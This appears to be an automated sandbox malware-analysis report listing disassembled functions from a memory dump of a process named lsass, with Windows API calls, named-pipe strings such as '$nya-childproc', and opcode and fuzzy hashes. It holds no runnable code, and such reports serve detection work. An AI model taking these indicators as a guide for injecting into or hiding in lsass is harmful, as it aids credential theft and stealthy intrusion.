WriteFile.KERNEL32 ref: 00000140AE862590
ReadFile.KERNEL32 ref: 00000140AE8625AF
CloseHandle.KERNEL32 ref: 00000140AE8625B8

Strings

\\.\pipe\$nya-childproc, xrefs: 00000140AE862549

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 7cc910c9b8b5c23ff5329ae8c1745924814e302ec66320a935cbe0706c4e695e
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 91114932654B4082E7119F26F45879AB7A1F789BE5FA40315EF9D03AA8DF3CC548CB81

Function 00000140AE867C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000140AE867C78
__scrt_acquire_startup_lock.LIBCMT ref: 00000140AE867CCA
_RTC_Initialize.LIBCMT ref: 00000140AE867CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000140AE867D1E
__scrt_release_startup_lock.LIBCMT ref: 00000140AE867D49

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: fdba535223e4d6e691733c195be15de6f35b588baec698ad2747609982f32f06
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 8881C0306807418BFB53AB6794513E96292AB8DBB4F744025AF0D473BADB3ACC45C3C2

Function 00000140ADFC7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000140ADFC7078
__scrt_acquire_startup_lock.LIBCMT ref: 00000140ADFC70CA
_RTC_Initialize.LIBCMT ref: 00000140ADFC70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000140ADFC711E
__scrt_release_startup_lock.LIBCMT ref: 00000140ADFC7149

Memory Dump Source

Source File: 00000009.00000003.2361554206.00000140ADFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_140adfc0000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 85711186c97cbff0377e5c2e715167015312233b22c8c2c25ea7c2fcbbf1993f
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 02819F3162038947FA579B2798413DB72B3AF8E784F7881159F49477B6DB38C867A700

Function 00000140AE869AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00000140AE869C6B,?,?,?,00000140AE86945C,?,?,?,?,00000140AE868F65), ref: 00000140AE869B31
GetLastError.KERNEL32(?,?,?,00000140AE869C6B,?,?,?,00000140AE86945C,?,?,?,?,00000140AE868F65), ref: 00000140AE869B3F
LoadLibraryExW.KERNEL32(?,?,?,00000140AE869C6B,?,?,?,00000140AE86945C,?,?,?,?,00000140AE868F65), ref: 00000140AE869B69
FreeLibrary.KERNEL32(?,?,?,00000140AE869C6B,?,?,?,00000140AE86945C,?,?,?,?,00000140AE868F65), ref: 00000140AE869BD7
GetProcAddress.KERNEL32(?,?,?,00000140AE869C6B,?,?,?,00000140AE86945C,?,?,?,?,00000140AE868F65), ref: 00000140AE869BE3

Strings

api-ms-, xrefs: 00000140AE869B51

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 9b9d92c5250aad3cb055442c4d292a2c940a33d7f5c17eb1e135a46569d01d98
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 8B315A31292B5091EE239B17A8007E92394FB4DBB0F790625AE1D4B7A4EE3CC844C392

Function 00000140AE873400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000140AE873431
GetLastError.KERNEL32 ref: 00000140AE87343D
CloseHandle.KERNEL32 ref: 00000140AE873455
CreateFileW.KERNEL32 ref: 00000140AE873480
WriteConsoleW.KERNEL32 ref: 00000140AE87349F

Strings

CONOUT$, xrefs: 00000140AE873461

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 98f31336ca50ed8072dedac400a18e145e28bb25d61f32fad1ddb8045cb7b402
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: BC117931290B4086E7529B53A86479976A0B79CBF4F640224EF5E87BA4CB38C804C786

Function 00000140AE866270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000140AE8662AB
GetThreadContext.KERNEL32 ref: 00000140AE866415

Part of subcall function 00000140AE8660A0: GetCurrentThreadId.KERNEL32 ref: 00000140AE8660A4

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: d470fa2b332134bf608e2e37984f554f1154689177c6186929d7326d993ad346
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 0AD19C76244B8882EA719B0AE49439A77A0F38CB98F600116EFCD477B5DF3DC951DB81

Function 00000140AE862098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000140AE8620A6
TlsFree.KERNEL32 ref: 00000140AE86225F
TlsFree.KERNEL32 ref: 00000140AE86226B
TlsFree.KERNEL32 ref: 00000140AE862277
TlsFree.KERNEL32 ref: 00000140AE862283
TlsFree.KERNEL32 ref: 00000140AE86228F

Part of subcall function 00000140AE865E50: GetCurrentThreadId.KERNEL32 ref: 00000140AE865E66

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: a81d9dcb6b7abe47899e749abfef0a334bbdceb0d443c9777401c9a22bc2a4ee
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 8151A571281B4595EF07EB2AE8502D463A2BB0C7A8FA40915AF2D077B5EF78DD54C3C2

Function 00000140AE8635C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE8635EB
HeapAlloc.KERNEL32(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE8635FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE863673
GetProcessHeap.KERNEL32(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE8636D9
HeapFree.KERNEL32(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE8636E7

Strings

$nya-, xrefs: 00000140AE86366C

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: f9418c794d8d54a96e405f35dd2266103e973814a1a1025377e54d55553bbc2e
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: F9318E32741B9192EB12DF17E9407A963A1FB98BA4F2880208F4C47B75EF34DC61C781

Function 00000140AE86C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000140AE86C94F
SetLastError.KERNEL32 ref: 00000140AE86C96E
FlsSetValue.KERNEL32 ref: 00000140AE86C997
FlsSetValue.KERNEL32 ref: 00000140AE86C9A8
FlsSetValue.KERNEL32 ref: 00000140AE86C9B9

Part of subcall function 00000140AE86D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000140AE86674A), ref: 00000140AE86D2B6
Part of subcall function 00000140AE86D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000140AE86674A), ref: 00000140AE86D2C0

SetLastError.KERNEL32 ref: 00000140AE86C9DC

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 905f3d60cdc7003f3bbbbb79e9b8bc607d62d69e82a5cda8593bf9adb4fb4abe
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: C511303128434046FB1A7B3364113EA2152AB8C7B0FB44624AF6E577EACE38DC01C782

Function 00000140AE861A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000140AE861A56
K32GetModuleFileNameExW.KERNEL32 ref: 00000140AE861A74
PathFindFileNameW.SHLWAPI ref: 00000140AE861A83
lstrlenW.KERNEL32 ref: 00000140AE861A8F
StrCpyW.SHLWAPI ref: 00000140AE861AA2
CloseHandle.KERNEL32 ref: 00000140AE861AB0

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: ef1a1a32d087f8f7b9728cdc05088cef9e654416d3adb2fed78c76f7d4e656ca
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: FE011731744B8086EB15EB13A85839963A1FB8CFE1FA840359F9D43764DE38C985C781

Function 00000140AE863E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000140AE863AAC), ref: 00000140AE863E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000140AE863AAC), ref: 00000140AE863E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000140AE863AAC), ref: 00000140AE863E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000140AE863AAC), ref: 00000140AE863E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000140AE863AAC), ref: 00000140AE863E9F
TerminateThread.KERNEL32(?,?,?,?,?,00000140AE863AAC), ref: 00000140AE863EAE

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 6c8a3988af53568c6b7d5d3e945e588ec54f25c6d59e7b738af72daf99e024a2
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 42010975651B4082FB26AB23E84879573A1AF9DBA5F640028CF4D07774EF3DC848C782

Function 00000140AE86B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000140AE86B929
GetProcAddress.KERNEL32 ref: 00000140AE86B93F
FreeLibrary.KERNEL32 ref: 00000140AE86B95B

Strings

mscoree.dll, xrefs: 00000140AE86B920
CorExitProcess, xrefs: 00000140AE86B938

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 3e62b6f4eded78c39dbe87eabcaa7ef6fe218e6a936e55e5fdf1698110d071ff
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 50F06D71290B0181EB169B26A8953E96320AB8D7B4FB402299F6E471F4DF38CC48C282

Function 00000140AE863708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,00000140AE86275A), ref: 00000140AE86372A
StrCpyW.SHLWAPI ref: 00000140AE86373A
StrCatW.SHLWAPI ref: 00000140AE863746
PathCombineW.SHLWAPI(?,?,00000000,00000140AE86275A), ref: 00000140AE863754

Strings

\\.\pipe\, xrefs: 00000140AE863720

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 9a81df958154396c5aaf96113f36e1fad7df758da98bd7beb4fa9050bdf33f7b
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 39F05E74344B8082EB069B13B9141996661AB4DFE0F748030EF1E0BB38CE38C845C781

Function 00000140AE865810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000140AE865896

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: bbc127f35c5560cdeb793558dc9aefb105b444ebade9037f95e966a343d1f239
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 1802DC32159B8486E761DB56F49039AB7A0F7C87A4F200415EF8E87BA8DF7CC854CB41

Function 00000140AE862C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000140AE862CAD
TlsGetValue.KERNEL32 ref: 00000140AE862CBC
TlsGetValue.KERNEL32 ref: 00000140AE862CCB
TlsSetValue.KERNEL32 ref: 00000140AE862E0F
TlsSetValue.KERNEL32 ref: 00000140AE862E1E
TlsSetValue.KERNEL32 ref: 00000140AE862E2D

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: d89edb8fd97b678989d4e0d555f6ed6a7bbd63ec31b92eef1536de30159fe236
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 02519E356447518BE366DB1BA440A9AB3A1F78CBA4F7041299F4E43B74DF38CD45CB82

Function 00000140AE862AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000140AE862AE1
TlsGetValue.KERNEL32 ref: 00000140AE862AF0
TlsGetValue.KERNEL32 ref: 00000140AE862AFF
TlsSetValue.KERNEL32 ref: 00000140AE862C3B
TlsSetValue.KERNEL32 ref: 00000140AE862C4A
TlsSetValue.KERNEL32 ref: 00000140AE862C59

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 88ad7280715c3692988ced099907e6a5f31f10e172645ce38b59168940cbd441
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: C1517B3625475187E726DF1BA840A9AB3A5F78CBA4F604159DF4E43B64DF38CC05CB81

Function 00000140AE865E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000140AE865E66

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 8dccc9c4f5f39d0e34916fbd10d3c21f5b49362c2f510ebc6df5edcc525ea595
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 9C61C636169B80C7EB619B16E45035AB7A0F7887A4F601515EF8D47BB8DB7CC940CB82

Function 00000140AE863EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

